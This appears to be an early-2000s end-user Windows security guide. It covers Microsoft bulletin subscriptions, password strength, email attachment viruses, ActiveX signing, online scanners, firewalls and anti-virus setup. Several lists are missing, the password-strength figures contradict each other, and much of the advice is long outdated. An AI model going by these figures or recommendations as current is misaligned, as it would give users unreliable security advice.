-----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGP 6.0.2 mQENAziJZQwAAAEIALIflq+a5TJ5+rkJl6u4NtaEgeggoufIFy2O0luplLaE+3sw E0MfG7Hr9b9yNLjMOD7/ZakIy4/54ph910K7qx1r3swo97gPuiDf11AhPzpmMe3m iP2EV3XeoL0e69GF/AwZ/KB4im+/WMMqwHmF4OjWZX4PWG7QA3YM+mRg8x4768So thxKx1sMO/ll1lAqryyzkWO3hODuOs7UiCPy0PgFBtlZ/qJU8VR/8z1vWX6aTDcl 3plT6MXiQuBGWXb/jHHfUEC7s5BtmWtA/Sdxf/oVDothMg48otI6tetzf/Rp6asa PmmOH99+QE2At4YYbtK3a7/ss7YTjRlJFDED9SsABRG0OU1pY3Jvc29mdCBTZWN1 cml0eSBSZXNwb25zZSBDZW50ZXIgPHNlY3VyZUBtaWNyb3NvZnQuY29tPokBFQMF EDiJZQyNGUkUMQP1KwEBmCkH/ReYt47MhLQ8lk+thpNwnwWpFMYnhi1189sZy+GH p44pCdQ7dfubR2/JiCIjlXqtR6Mu5NzSnjt3l217ss11/X+iuZR4fjOTNFz1b77M /OwTPNNkZTxL5nJ3BIBcTDKRaErTk5oZt5nXUPpzIwM/GQ17A9okL6qOFcreNR/a 6cO8DiPBgbvgrs560+NpEk2lBBP7yvaHJqwqQnRQCZ15uqhtIl/BlxEYE32XWgu+ k1RxrRRuW3NX9Q0cEXmioSiI+1V31E0H6Pa8e7Vy/EORsNopRgiZr/JBON0vCrDf UTlwjUufpCnM2VBvNi/O3C2BhJoL9hEF0X0rzQN87j1wpO6JARUDBRA4jIFR/6uy 0GMwPK8BAS5lB/9rOkn/35961yqfROBooGW1g9CrM/3hX+jZf0z4NUYOoLoXQQGM 9kVDpmsnADytOJ2xNgle9WWEzPLfcwJv4C7o1Yp4UAHeNKOzUH6hFCz7QzfkQ+dY aZCoL8r0qrUyNQJ263FDupo5NBt4XCDTd0zYfbUkbeHKsECKTB6tJVtUzD9jMUjq 9LVaqY/+4/NQSjOOhImlA1khF9oTypR+jloaAflEal3/Cuo1ibHgd6j1dYjHQy7p X3iOnlRAdpG445U+Y3uEzsqiZVY1hK46ICZF+r19Xm7gPC3p0Jo5/K7oXepKnfgn 0zjm496p6l++ie973TTRW844JLMmLZ82h/14 =3JpF -----END PGP PUBLIC KEY BLOCK-----
The key's fingerprint is 5E39 0633 D6B3 9788 F776 D980 AB7A 9432.
It is very important that when Microsoft announces a vulnerability and a patch that the advice be taken seriously and the patch installed. You can be sure that if you know about the vulnerability so do all of the potential virus writers and others that might want to attack your computer system. By installing the patches or removing services that are considered vulnerable you significantly reduce the chances that attacks against your computer will succeed.
microsoft_security-subscribe-request@announce.microsoft.com
The subject line and the message body are not used to process the subscription request, and can be anything you like. Send the e-mail. You'll receive a response, asking you to verify that you really want to subscribe. Compose a reply, and put "OK" in the message body. (Without the quotes). Send the reply You'll receive two e-mails, one telling you that you've been added to the subscriber list, and the other with more information on the notification the service and its purpose. You'll receive security notifications whenever Microsoft sends them.
Compose an e-mail to
microsoft_security-signoff-request@announce.microsoft.com
The subject line and the message body are not used to process the subscription request, and can be anything you like. Send the e-mail. You'll receive a response, asking you to verify that you really want to cancel your subscription. Compose a reply, and put "OK" in the message body. (Without the quotes). Send the reply. You'll receive an e-mail telling you that your name has been removed from the subscriber list.
The most common ways for an attacker to take advantage of a user are:
To prevent these types of attacks requires a change in the way you interact with your computer.
The most secure systems require at least two of the three types. Unfortunately, most computer systems still only require a password. This means that it is extremely important that the password be strong. What does it mean for a password to be strong? It means that the likelihood of it being guessed is very remote.
You may have read about different strengths of cryptographic algorithms. There has been a large amount of debate over how strong the U.S. government should allow the algorithms to be. This is because the stronger the keys used to privatize the communications the harder it is for the government to perform electronic wiretapping. Of course, the harder it is for the government the harder it is for criminals to listen in as well.
Starting in the 1970s the U.S. government began to require that all sensitive government communications be protected by the Data Encryption Standard (DES). DES used 56-bit keys. At the time 56-bit keys were considered unbreakable with the computer equipment available at the time. Now in the year 2001, a 56-bit DES key can be broken in under a day with some specially designed equipment made from off the shelf parts. The U.S. government has recently approved a replacement for DES called the Advanced Encryption Standard (AES). AES has a minimum key strength of 128-bits and a maximum key strength of 256-bits.
Now you may be asking yourself why am I spending all this time talking about various numbers of bits when I started off talking about passwords. Its actually pretty simple. A password is nothing more than data that is used to generate a key. That key is then used to protect some other data by encrypting it with a cryptographic algorithm. The strength of the key has a direct impact on how secure the data is that is being protected.
Passwords consist of printable characters: upper and lower case letters, numbers, punctuation marks, and some other symbols. Each character in your password contributes less than 7-bits to the resulting key. This means that an 8 character password is no more than 56-bit key. Remember that the 56-bit keys used with DES could be broken in under a day. With a modern 1 GHz computer with a gigabyte of memory and several hundred gigabytes of disk space, an attacker can break an 8 chararacter password in a little more than a day using a brute force attack.
Unfortunately, most users do not choose even 8 character passwords and the passwords they do choose are frequently words that are found in dictionary. Attackers can therefore optimize the attack by checking all of these common words first; then combinations of words; then addresses; phone numbers; birthdays; etc. This cuts down the time it would take to discover a password to a matter of minutes when the attack can be performed off-line. An off-line is one where the attacker does not need to access the computer being attacked while attempting to determine the password. An on-line attack is one where the attacker must contact the computer in order to try out each potential password. On-line attacks are costly due to the time it takes to establish the connection used to test each password; and the high risk of detection caused by the failed attempts.
Passwords are used for two purposes: to authenticate the user to a service in order to gain entry; or to unlock an encrypted file so that it can be read. Windows NT/2000/XP has multiple accounts. At a minimum it has an "Administrator" and a "Guest" account. In addition to this are any accounts that you create to represent yourself while using the computer. Since it is possible to remotely connect to a Windows NT/2000/XP system over the network and perform attempt to authenticate a user it is very important that the passwords used for the accounts be strong.
Your Windows password is also used to protect any "saved passwords" associated with dial-up connections; web sites; e-mail accounts; and other services provided by Microsoft Windows. Other applications may require other passwords to protect files that contain SSH, X.509 or PGP private keys; or passwords used when connecting to other hosts. It is important that all of these passwords not only be strong but be different. If one of the passwords was to be compromised you do not want to lose all of your passwords.
If you have ever lost your wallet containing your drivers license, social security card, credit cards, bank cards, and student identification you understand the pain caused when you lose everything at once. Losing your driver's license is bad enough, but with the rest of your IDs you can easily convince the State to issue you a replacement. However, when you lose all of your IDs and credit cards not only must you cancel everything you have lost, but you have no easy method for acquiring replacements since you have no form of identification.
I have used the term strong password many times now without defining what it means. A strong password:
An 8 character password is no stronger than 40-bits. A 12 character password is no stronger than 56-bits. A password that is stronger than 128-bits would have to be at least 26 characters long. (Unfortunately, for compatibility with older Windows versions the Windows password is restricted to 14 characters or no stronger than 70-bits.)
Passwords are often stolen because they are kept in plain view. Either by taping them to the computer on that they are used; or by storing them in a wallet, appointment book, or a personal digital assistant where they can be easily read. Clearly these are bad things to do.
Passwords are also frequently stolen by capturing unencrypted network traffic between your computer and a remote service you are attempting to login to. Passwords should never be sent over unencrypted connections whether that session be a HTTP (web), FTP (file transfer), TELNET (remote login), POP3 or IMAP (e-mail), or any other service. If you do not know that it is protected the password may not be sent.
Passwords are protected if the HTTP connection is secured by using SSL/TLS; when the FTP or Telnet sessions are authenticated using Kerberos, Secure Remote Password, or when the sessions are protected with SSL/TLS. Another service over which the risks of transmitting passwords is reduced is SSH.
Passwords should not be stored in the file system of a computer on which those passwords are used. If they do need to be stored on your computer they should be encrypted and protected with a super-strength password -- a password that is stronger than any of the passwords stored in the protected file.
The number one method for propogating viruses and worms is by using e-mail attachments. This has been the case for a long time. For as long as e-mail has been capable of transfering program and data files (whether uuencoded or using MIME) people have succumbed to the natural desire to share cool things with their friends. This meant that trojan horse viruses would be passed from person to person simply because someone thought that someone else should share the joke, the game, or office document. As the virus was activated on computer it would turn additional files into trojans to be used to spread the virus to other machines. This method is most frequently used with the macro viruses that infect data files for applications that contain integrated scripting languages (e.g., Microsoft Office applications.) By infecting documents which are frequently exchanged by users as part of their normal day to day activities a large number of computers can be infected in a passive manner.
Virus authors have learned to take advantage of the scripting languages and lower level operating system calls to write viruses which can not only infect local files but automatically mail themselves to e-mail addresses found in your electronic address books and files stored in your web cache. As application authors have placed restrictions on how e-mail can be sent using the built-in scripting languages, virus authors have written their own mailers to include as part of the virus. Viruses that actively mail themselves to others spread at a much faster rate than the older passive viruses. They also significantly increase the percentage of e-mail containing infected attachments.
The active attack e-mail viruses have produced a large increase in the amount of mail being sent on the Internet. E-week has estimated that the current e-mail infection rate is 1 out of every 300 e-mails. If the viruses continue to spread at their current rate it is thought that 1 in 10 e-mails will contain a virus by the end of 2002. It is therefore crucial that we stop treating attachments as harmless and instead treat them as something that must be quarantined and scanned for infection.
What rules should apply to e-mail attachments that will determine if the e-mail attachment you are receiving is safe to open?
The first rule is to determine if the e-mail itself is something we are expecting. If you have been partaking in an on-going dialog with a co-worker and then suddenly receive an e-mail with the same subject line saying nothing more than "Can you take a look at this for me?", you should be suspicious. Call or otherwise contact your co-worker to determine if she actually meant to send you the attached document. This is necessary because the virus has access to your mailbox. It is therefore possible for the virus to a reply to one of your received e-mails as a means for transporting itself to a new host. Even if your co-worker did intend to send the attachment, you must still scan it for viruses with your anti-virus software. You do not know if the attachment is free of known viruses unless you do.
The second rule is never to open attachments sent to mailing lists. For starters, mailing list etiquette states that attachments should not be sent for two reasons:
Unfortunately, being safe means that many conveniences that users are accustomed to must be disabled in PC based e-mail clients. No longer can we allow the use of preview modes; automatic display of messages simply by selecting the subject line; or the use of embedded scripting languages and executable program code. While these features do increase ease of use and allow for a more robust multimedia experience, these features increase the number of opportunities for a virus to be given access to the computer.
The are three actions that can be applied to a download from a web page:
Program files and documents should always be saved to disk, virus checked and then if they appear to be safe, executed or opened. Under normal conditions a web site will not contain any instructions to automatically attempt to download a file to your computer either for saving to a disk; or for automatic execution. If a web site has been modified to attack your computer (as was done by the Nimda virus) the browser will popup a window asking what you would like to do with the specified file (open, save or cancel). If you are not expecting a file to be downloaded, you should cancel the operation.
The verification of the ActiveX control is performed by comparing the signature associated with the control to a list of signing certificates which are stored in the browser's Certificate Authority Store. If a certificate can be found that matches the signature and that certificate is still valid, then the ActiveX control has been verified.
It is important to know that the security of this verification system is dependent on commercial companies such as Verisign that act as Certificate Authorities to not make mistakes. Unfortunately, no person or company is perfect. Verisign issued valid certificates to an unknown party which would give that individual the ability to sign ActiveX controls as "Microsoft Corporation". This forced Microsoft to issue a patch for Windows that disabled the ability of the mis-issued certificates from being validated by Windows. Unfortunately, any Windows system that is not patched is vulnerable to an attack by someone misrepresenting their ActiveX controls as being from Microsoft. The patch to correct this specific problem is available from the Microsoft Windows Updates web site.
ActiveX controls when signed can be marked as either as Safe for Scripting or Unsafe for Scripting. A Safe for Scripting control only indicates that the author of the control says that it is "safe". Microsoft describes the marking of a control as Safe for Scripting as the author entering into a legally binding contract with the user of the control. However, I doubt this would stop a virus author from abusing this flag.
ActiveX controls, unlike Java applets, have complete access to the computer using the identity of the user whom started the browser within which the control is executed. This makes the use of ActiveX controls a very tempting target for virus authors. The acquisition of the "Microsoft Corporation" signing certificate could have been used as part of a wide spread attack as most people will accept anything that Microsoft publishes to the web. The reason it is so important to ensure the "Root Certificates Update" be applied from the Windows Update site is to prevent these invalid certificates from being accepted as valid.
Permission is often requested when using web based installation routines. When java applets are used for this purpose, the web site should explain the permission request in their installation instructions. It goes without saying that you should not install software downloaded from the web that comes from a source that might not be trustworthy.
This section will attempt to highlight some of the features which may be unnecessarily putting you at risk as well as configuration options which can be applied to strengthen the security of the computer.
These operating systems can safely be used as a client only computer after several features have been disabled. Personal Web Server, File and Print Sharing, the Remote Registry Service should be uninstalled. Other remote access products such as PC Anywhere should not be installed.
Personal Web Server and Remote Registry Service are removed using the Add/Remove Programs Control Panel. File and Print Sharing is removed using the Network Control Panel.
It is strongly recommended that if your computer hardware will support Windows NT/2000/XP that you replace your operating system as NT/2000/XP can be configured in a significantly more secure manner.
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32362
http://support.microsoft.com/support/kb/articles/q303/2/15.asp?id=303215&sd=tech
http://www.microsoft.com/technet/mpsa/start.asp
is an ActiveX control that scans Windows NT and Win2000 client systems (not servers) for a variety of vulnerabilities:
To perform a scan:
Security Warning Do you want to install and run "Microsoft Personal Security Advisor" signed on 9/27/2001 4:19 PM and distributed by "Microsoft Corporation" Publisher authenticity verified by Microsoft Code Signing PCA.
Security Warning Do you want to install and run "MSSecure XML File" signed on 10/2/2001 1:02AM and distributed by "Microsoft Corporation" Publisher authenticity verified by Microsoft Code Signing PCA.
The scans are primarily useful to determine if your machine is currently harboring a known Trojan Horse and to determine if your Norton Anti-virus product is properly installed and the virus definitions are up to date.
The Network Vulnerability scan is an attempt to convince you to purchase a personal firewall product. See Section 8.6 for comments on personal firewalls. The scan works by attempting to establish a connection from the server to your workstation. The scan lets you know which ports (ie, services or trojans) are currently accessible on your machine.
WARNING: If you are behind a firewall these port scans may appear to be an attack to your system administrator. Do not run these scans unless you know that it is safe to do so.
NOTE: The fact that a port is accessible that is often used by a Trojan does not necessarily mean that a Trojan is running on your machine. All ports do have legitimate uses. The Internet Assigned Numbers Authority (IANA) publishes a list of the services assigned to each port number http://www.iana.org/assignments/port-numbers.
When executing the scan for the first time you are prompted to accept an executable file to be executed on your machine.
Security Warning Do you want to install and run "Symantec Security Check Utilities" signed on 5/10/2001 7:08pm and distributed by "Symantec Corporation".
Select "yes" but do not check "Always trust content from Symantec Corporation".
You may be asked if it is okay to run ActiveX controls and scripts several times, say "yes" to each question asked from this page.
http://www.microsoft.com/technet/security/tools/urlscan.asp
http://windowsupdate.microsoft.com
http://office.microsoft.com/productupdates
http://www.microsoft.com/security/
In addition, the Microsoft Security site provides a query engine which can be used to produce a list of all updates released for a given version of an operating system or application (sorted by month of issuance.)
http://www.microsoft.com/technet/security/current.asp
http://www.ntbugtraq.com
http://www.sarc.com/ http://www.symantec.com/avcenter/
http://www.cert.org/The CERT web site contains information on a wide variety of topics associated with computer security.
It does not matter whether you backup your data to a tape drive, a removable disk (zip, jaz, ...), or to a remote network based back-up service. What is important is that your data be backed up on a regular basis so that if your computer was lost tomorrow or if you needed to reformat your hard disk that you would not be in a state of panic.
Need to find a reference to an online article on backup procedures
Software based firewall software can either be stateful or stateless. A stateless firewall can only apply access policies to connections to/from specific IP address ranges and/or specific ports. Stateful firewalls have a detailed understanding of the networking protocols used by each network services. They can use this information to apply access policies based upon the content of the communication and not just on who is communicating.
As an example, the personal firewall software ZoneAlarm has a MailSafe option that disables .vbs scripts in email (POP/IMAP) by 'quarantining' them with '.zlx' (x changes) extension. If the user tries to open it, he/she has to go through Zone Alarm and state the specific e-mail message being received should be allowed.
It is important to note that firewalls are not the answer to all security concerns. Blocking all connections to specific ports can break required applications. It can be a very complicated and time consuming process to develop the appropriate set of access policies for your computer. Many application errors that appear to be network related can be traced back to firewall access policies which block required access. Unfortunately, from the standpoint of the application, the failure is a network error as it does not know anything about the presence of the firewall.
http://www.columbia.edu/acis/software/nav/
It is important that after installation the Anti-Virus software be configured and regularly updated with the latest virus definition files in order for the software's effectiveness to be maintained. The Anti-virus options
Manual scans should be configured to check all boot records on all drives as well as scan all files and all files within compressed files (.ZIP, .CAB, ...) The only type of files that should be avoided are those associated with database files since there can be incompatibilities between Microsoft Access or Microsoft SQL Server and anti-virus software.
If you are running Microsoft Office 2000 (or Office XP) the Office 2000 plug-in support should be enabled.
Manual scans of the computer should be scheduled at least once a week.
AcIS' Schuyler has put together a nice user level description of how to configure e-mail clients to safely read e-mail in conjunction with NAV.
http://www.columbia.edu/acis/email/topics/safeattachments.html
Microsoft products are used on the overwhelming majority of computers on this planet. Microsoft is a monopoly. Microsoft is an American company. The products have their fair share of vulnerabilities and the cost of ownership is so high that it is difficult even on a good day to keep up with the patches. Therefore, Microsoft products have become a more tempting target as each day goes by.
As there are only a finite number of resources for virus/worm authors, they spend their time attacking the systems that are most likely to allow them to cause the greatest havoc. At the moment these are the products of Microsoft. It is in the best interest of each of us to consider whether or not we should continue using products that have such a high incident rate of attacks. This is exactly the same analysis we would use to determine where to go on vacation. Do we head for the mystical land where people are being killed everyday or the quiet beach community half a world away.
This section attempts to provide some alternatives that might be considered if you believe that the total cost of using Windows and Microsoft Applications is higher than you can bear.